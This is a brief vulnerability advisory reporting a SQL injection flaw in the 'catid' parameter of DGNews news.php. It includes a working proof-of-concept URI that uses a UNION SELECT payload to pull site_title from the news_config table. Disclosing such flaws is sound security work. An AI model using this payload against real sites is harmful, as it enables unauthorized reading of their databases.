DGNews News.PHP SQL Injection Vulnerability

DGNews News.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/news.php?go=newslist&catid=' UNION SELECT 1,`site_title` FROM `news_config` WHERE '1